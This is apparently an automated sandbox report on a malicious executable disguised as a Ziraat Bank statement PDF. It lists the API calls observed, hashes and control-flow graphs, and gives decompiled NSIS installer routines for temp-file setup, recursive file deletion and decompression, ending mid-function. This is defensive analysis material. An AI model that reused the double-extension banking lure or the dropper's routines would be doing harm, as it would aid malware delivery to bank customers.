                                                  0x00000000
                                                  0x00000000
                                                  0x00403a35
                                                  0x00403a40
                                                  0x00403a45
                                                  0x00000000
                                                  0x00403a45
                                                  0x004039c3
                                                  0x004039db
                                                  0x004039ec
                                                  0x004039ed
                                                  0x004039f1
                                                  0x004039f3
                                                  0x00403a01
                                                  0x00403a08
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403a08
                                                  0x00403a0a
                                                  0x00000000
                                                  0x00403a0a
                                                  0x0040392d
                                                  0x00403939
                                                  0x0040393e
                                                  0x00403943
                                                  0x00403945
                                                  0x00000000
                                                  0x00000000
                                                  0x0040394d
                                                  0x00403955
                                                  0x00403966
                                                  0x0040396e
                                                  0x00403970
                                                  0x00403975
                                                  0x00403977
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403977
                                                  0x00000000
                                                  0x004038d4
                                                  0x0040387d
                                                  0x0040387f
                                                  0x00000000
                                                  0x00000000
                                                  0x00403881
                                                  0x00403885
                                                  0x00403889
                                                  0x00403890
                                                  0x00403890
                                                  0x00403890
                                                  0x00403890
                                                  0x00000000
                                                  0x00403890
                                                  0x0040388b
                                                  0x0040388e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040388e
                                                  0x00403827
                                                  0x0040382b
                                                  0x0040382e
                                                  0x00403835
                                                  0x00403835
                                                  0x00000000
                                                  0x00403835
                                                  0x00403830
                                                  0x00403833
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403833
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403801
                                                  0x00403801
                                                  0x00403802
                                                  0x00403803
                                                  0x00403803
                                                  0x00000000
                                                  0x00403801
                                                  0x00000000

                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                  • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                  • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                  • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                  • OleInitialize.OLE32(00000000), ref: 0040377D
                                                  • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                  • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe",00000020,"C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe",00000000), ref: 004037E9
                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403939
                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403955
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403966
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 0040396E
                                                  • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                    • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                  • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe",00000000,?), ref: 00403A8F
                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 00403AAF
                                                  • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,00420F08,00000001), ref: 00403B21
                                                  • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                  • ExitProcess.KERNEL32(?), ref: 00403B6C
                                                  • OleUninitialize.OLE32(?), ref: 00403B71
                                                  • ExitProcess.KERNEL32 ref: 00403B8B
                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                  • ExitProcess.KERNEL32 ref: 00403C1F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                  • String ID: "C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                  • API String ID: 2292928366-455684950
                                                  • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                  • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                  • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                  • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 395 405d74-405d9a call 40603f 398 405db3-405dba 395->398 399 405d9c-405dae DeleteFileW 395->399 401 405dbc-405dbe 398->401 402 405dcd-405ddd call 406668 398->402 400 405f30-405f34 399->400 403 405dc4-405dc7 401->403 404 405ede-405ee3 401->404 410 405dec-405ded call 405f83 402->410 411 405ddf-405dea lstrcatW 402->411 403->402 403->404 404->400 406 405ee5-405ee8 404->406 408 405ef2-405efa call 40699e 406->408 409 405eea-405ef0 406->409 408->400 419 405efc-405f10 call 405f37 call 405d2c 408->419 409->400 414 405df2-405df6 410->414 411->414 415 405e02-405e08 lstrcatW 414->415 416 405df8-405e00 414->416 418 405e0d-405e29 lstrlenW FindFirstFileW 415->418 416->415 416->418 420 405ed3-405ed7 418->420 421 405e2f-405e37 418->421 435 405f12-405f15 419->435 436 405f28-405f2b call 4056ca 419->436 420->404 426 405ed9 420->426 423 405e57-405e6b call 406668 421->423 424 405e39-405e41 421->424 437 405e82-405e8d call 405d2c 423->437 438 405e6d-405e75 423->438 427 405e43-405e4b 424->427 428 405eb6-405ec6 FindNextFileW 424->428 426->404 427->423 431 405e4d-405e55 427->431 428->421 434 405ecc-405ecd FindClose 428->434 431->423 431->428 434->420 435->409 441 405f17-405f26 call 4056ca call 406428 435->441 436->400 446 405eae-405eb1 call 4056ca 437->446 447 405e8f-405e92 437->447 438->428 442 405e77-405e80 call 405d74 438->442 441->400 442->428 446->428 450 405e94-405ea4 call 4056ca call 406428 447->450 451 405ea6-405eac 447->451 450->428 451->428
                                                  C-Code - Quality: 98%
                                                  			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                  0x00405d7e
                                                  0x00405d83
                                                  0x00405d8c
                                                  0x00405d8f
                                                  0x00405d97
                                                  0x00405d9a
                                                  0x00405d9d
                                                  0x00405da5
                                                  0x00405da7
                                                  0x00405da8
                                                  0x00000000
                                                  0x00405da8
                                                  0x00405db3
                                                  0x00405db6
                                                  0x00405db6
                                                  0x00405db6
                                                  0x00405dba
                                                  0x00405dcd
                                                  0x00405dd4
                                                  0x00405dd9
                                                  0x00405ddd
                                                  0x00405ded
                                                  0x00405ddf
                                                  0x00405de5
                                                  0x00405de5
                                                  0x00405df2
                                                  0x00405df6
                                                  0x00405e02
                                                  0x00405e08
                                                  0x00405e0d
                                                  0x00405e13
                                                  0x00405e1e
                                                  0x00405e24
                                                  0x00405e26
                                                  0x00405e29
                                                  0x00405ed3
                                                  0x00405ed3
                                                  0x00405ed7
                                                  0x00405ed9
                                                  0x00405ed9
                                                  0x00405ed9
                                                  0x00405ed9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405e2f
                                                  0x00405e2f
                                                  0x00405e2f
                                                  0x00405e37
                                                  0x00405e57
                                                  0x00405e5f
                                                  0x00405e64
                                                  0x00405e6b
                                                  0x00405e86
                                                  0x00405e8b
                                                  0x00405e8d
                                                  0x00405eb1
                                                  0x00405e8f
                                                  0x00405e8f
                                                  0x00405e92
                                                  0x00405ea6
                                                  0x00405e94
                                                  0x00405e97
                                                  0x00405e9f
                                                  0x00405e9f
                                                  0x00405e92
                                                  0x00405e6d
                                                  0x00405e73
                                                  0x00405e75
                                                  0x00405e7b
                                                  0x00405e7b
                                                  0x00405e75
                                                  0x00000000
                                                  0x00405e6b
                                                  0x00405e39
                                                  0x00405e41
                                                  0x00000000
                                                  0x00000000
                                                  0x00405e43
                                                  0x00405e4b
                                                  0x00000000
                                                  0x00000000
                                                  0x00405e4d
                                                  0x00405e55
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405eb6
                                                  0x00405ebe
                                                  0x00405ec4
                                                  0x00405ec4
                                                  0x00405ecd
                                                  0x00000000
                                                  0x00405ecd
                                                  0x00405df8
                                                  0x00405e00
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405dbc
                                                  0x00405dbc
                                                  0x00405dbe
                                                  0x00405ede
                                                  0x00405ee0
                                                  0x00405ee3
                                                  0x00405f34
                                                  0x00405f34
                                                  0x00405f34
                                                  0x00405ee5
                                                  0x00405ee8
                                                  0x00405ef3
                                                  0x00405ef8
                                                  0x00405efa
                                                  0x00000000
                                                  0x00000000
                                                  0x00405efd
                                                  0x00405f09
                                                  0x00405f0e
                                                  0x00405f10
                                                  0x00000000
                                                  0x00405f2b
                                                  0x00405f12
                                                  0x00405f15
                                                  0x00000000
                                                  0x00000000
                                                  0x00405f1a
                                                  0x00000000
                                                  0x00405f21
                                                  0x00405eea
                                                  0x00405eea
                                                  0x00000000
                                                  0x00405eea
                                                  0x00405dc4
                                                  0x00405dc7
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405dc7

                                                  APIs
                                                  • DeleteFileW.KERNELBASE(?,?,772EFAA0,772EF560,00000000), ref: 00405D9D
                                                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsqD5A.tmp\*.*,\*.*), ref: 00405DE5
                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user~1\AppData\Local\Temp\nsqD5A.tmp\*.*,?,?,772EFAA0,772EF560,00000000), ref: 00405E0E
                                                  • FindFirstFileW.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\nsqD5A.tmp\*.*,?,?,?,0040A014,?,C:\Users\user~1\AppData\Local\Temp\nsqD5A.tmp\*.*,?,?,772EFAA0,772EF560,00000000), ref: 00405E1E
                                                  • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                  • FindClose.KERNELBASE(00000000), ref: 00405ECD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: .$.$C:\Users\user~1\AppData\Local\Temp\nsqD5A.tmp\*.*$\*.*
                                                  • API String ID: 2035342205-2502937420
                                                  • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                  • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                  • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                  • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 553 406d5f-406d64 554 406dd5-406df3 553->554 555 406d66-406d95 553->555 556 4073cb-4073e0 554->556 557 406d97-406d9a 555->557 558 406d9c-406da0 555->558 559 4073e2-4073f8 556->559 560 4073fa-407410 556->560 561 406dac-406daf 557->561 562 406da2-406da6 558->562 563 406da8 558->563 564 407413-40741a 559->564 560->564 565 406db1-406dba 561->565 566 406dcd-406dd0 561->566 562->561 563->561 570 407441-40744d 564->570 571 40741c-407420 564->571 567 406dbc 565->567 568 406dbf-406dcb 565->568 569 406fa2-406fc0 566->569 567->568 572 406e35-406e63 568->572 576 406fc2-406fd6 569->576 577 406fd8-406fea 569->577 579 406be3-406bec 570->579 573 407426-40743e 571->573 574 4075cf-4075d9 571->574 580 406e65-406e7d 572->580 581 406e7f-406e99 572->581 573->570 578 4075e5-4075f8 574->578 582 406fed-406ff7 576->582 577->582 586 4075fd-407601 578->586 583 406bf2 579->583 584 4075fa 579->584 585 406e9c-406ea6 580->585 581->585 587 406ff9 582->587 588 406f9a-406fa0 582->588 590 406bf9-406bfd 583->590 591 406d39-406d5a 583->591 592 406c9e-406ca2 583->592 593 406d0e-406d12 583->593 584->586 595 406eac 585->595 596 406e1d-406e23 585->596 604 407581-40758b 587->604 605 406f7f-406f97 587->605 588->569 594 406f3e-406f48 588->594 590->578 597 406c03-406c10 590->597 591->556 606 406ca8-406cc1 592->606 607 40754e-407558 592->607 598 406d18-406d2c 593->598 599 40755d-407567 593->599 600 40758d-407597 594->600 601 406f4e-407117 594->601 612 406e02-406e1a 595->612 613 407569-407573 595->613 602 406ed6-406edc 596->602 603 406e29-406e2f 596->603 597->584 611 406c16-406c5c 597->611 614 406d2f-406d37 598->614 599->578 600->578 601->579 609 406f3a 602->609 610 406ede-406efc 602->610 603->572 603->609 604->578 605->588 616 406cc4-406cc8 606->616 607->578 609->594 617 406f14-406f26 610->617 618 406efe-406f12 610->618 619 406c84-406c86 611->619 620 406c5e-406c62 611->620 612->596 613->578 614->591 614->593 616->592 621 406cca-406cd0 616->621 624 406f29-406f33 617->624 618->624 627 406c94-406c9c 619->627 628 406c88-406c92 619->628 625 406c64-406c67 GlobalFree 620->625 626 406c6d-406c7b GlobalAlloc 620->626 622 406cd2-406cd9 621->622 623 406cfa-406d0c 621->623 629 406ce4-406cf4 GlobalAlloc 622->629 630 406cdb-406cde GlobalFree 622->630 623->614 624->602 631 406f35 624->631 625->626 626->584 632 406c81 626->632 627->616 628->627 628->628 629->584 629->623 630->629 634 407575-40757f 631->634 635 406ebb-406ed3 631->635 632->619 634->578 635->602
                                                  C-Code - Quality: 98%
                                                  			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
